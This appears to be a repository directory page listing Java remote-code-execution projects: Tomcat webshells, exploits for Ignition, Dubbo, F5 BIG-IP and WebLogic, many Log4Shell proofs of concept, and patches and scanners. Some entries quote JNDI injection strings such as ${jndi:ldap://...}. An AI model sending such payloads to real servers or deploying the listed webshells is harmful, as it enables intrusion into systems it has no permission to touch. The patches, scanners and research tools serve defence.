22 Repositories
Java rce Libraries
A webshell application and interactive shell for pentesting Apache Tomcat servers.
Apache Tomcat webshell application for RCE A webshell application and interactive shell for pentesting Apache Tomcat servers. Features Webshell plugin
A pre-authenticated RCE exploit for Inductive Automation Ignition
Randy What This is a pre-authenticated RCE exploit for Inductive Automation Ignition that impacts versions = 8.1.16. We failed to exploit the bugs at
An agent to hotpatch the log4j RCE from CVE-2021-44228.
Log4jHotPatch This is a tool which injects a Java agent into a running JVM process. The agent will attempt to patch the lookup() method of all loaded
Log4j-RCE (CVE-2021-44228) Proof of Concept with additional information
Log4J-RCE-Proof-Of-Concept (CVE-2021-44228) This is a proof of concept of the log4j rce. Here are some links for the CVE-2021-44228: https://www.lunas
Deploys an agent to fix CVE-2021-44228 (Log4j RCE vulnerability) in a running JVM process
-- This repository has been archived -- Further development of this tool will continue at corretto/hotpatch-for-apache-log4j2. Thanks for sharing, com
log4j2 rce、poc
Apache Log4j 2 Apache log4j2 开源日志组件远程代码执行 攻击者通过构造恶意请求,触发服务器log4j 2 日志组件的远程代码执行漏洞。漏洞无需特殊配置,经验证,最新版的补丁可以防护此问题 官方最新补丁: log4j-2.15.0-rc2 紧急处置方案 2.10 or 以上
Non intrusive log4j2 RCE vulnerability patch.
Log4j Patch Resolve the RCE vulnerability caused by JNDI lookup in log4j 2.0~2.14.1. It is licensed under the WTFPL 2.0 license, you can do anything w
Apache/Alibaba Dubbo = 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Data; Affects Versions = 2.7.6 With Different Gadgets
The 0xDABB of Doom - CVE-2021-25641-Proof-of-Concept Apache/Alibaba Dubbo = 2.7.3 PoC Code for CVE-2021-25641 RCE via Deserialization of Untrusted Da
F5 BIG-IP iControl REST vulnerability RCE exploit with Java including a testing LAB
CVE-2022-1388 F5 BIG-IP iControl REST vulnerability RCE exploit with Java and ELF. Included Scan a single target Scan many targets Exploit with a shel
A webshell application and interactive shell for pentesting Apache Tomcat servers.
Apache Tomcat webshell application for RCE A webshell application and interactive shell for pentesting Apache Tomcat servers. Features Webshell plugin
spring-cloud-function SpEL RCE, Vultarget & Poc
spring-cloud-function SpEL RCE Vultarget You can build it for youself. here is the source of the Vuln App Or you can use the release which built by cc
A Basic Java Application Vulnerable to the Log4Shell RCE
This is a basic, minimal, intentionally vulnerable Java web application including a version (2.14.1) of the log4j library affected by the infamous log4shell (CVE-2021-44228) vulnerability.
Log4Shell Zero-Day Exploit Proof of Concept
Log4Shell Zero-Day Exploit if attacker manage to log this string ${jndi:ldap://someaddresshere/param1=value1} to log4j it somehow loads the class/java
An LDAP RCE exploit for CVE-2021-44228 Log4Shell
log4j-poc An LDAP RCE exploit for CVE-2021-44228 Log4Shell Description The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed
Removal of JndiLookup in now obsolete Minecraft versions, or versions that still have log4j 2.10 and is unable to use
NukeJndiLookupFromLog4j Removal of JndiLookup in now obsolete Minecraft versions, or versions that still have log4j 2.10 and is unable to use -Dlog4
Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.
Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.
Log4j2Scan - Log4j2 RCE Passive Scanner plugin for BurpSuite
Log4j2Scan This tool is only for learning, research and self-examination. It should not be used for illegal purposes. All risks arising from the use o
Log4shell-hunter - Scanner that scans local files for log4shell vulnerability
Log4shell-hunter - Scanner that scans local files for log4shell vulnerability. Does bytecode analysis so it does not rely on metadata. Will find vulnerable log4j even it has been self-compiled/repackaged/shaded/nested (e.g. uberjar, fatjar) and even obfuscated.
CVE-2021-44228 - Apache log4j RCE quick test
Build ./build.sh Start log4j RCE Server ./start-log4j-rce-server.sh Test Run java -cp log4j-rce-1.0-SNAPSHOT-all.jar log4j Check if you get logs in ha
Apache Log4j2 CVE-2021-44228 RCE Demo with RMI and LDAP
CVE-2021-44228-Demo 利用 CVE-2021-44228,通过 RMI 和 LDAP 两种方式远程注入代码的示例。 Exploit class from RMI Server loaded Hello, ${jndi:rmi://127.0.0.1:1099/exploit} Ex
spring boot Fat Jar 应用文件上传漏洞到 RCE 的利用技巧
spring-boot-upload-file-lead-to-rce-tricks 一. 原理文章 Spring Boot Fat Jar 写文件漏洞到稳定 RCE 的探索 二. docker 漏洞环境搭建 docker pull landgrey/spring-boot-fat-jar-writ
CVE-2021-2109 && Weblogic Server RCE via JNDI
Description Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected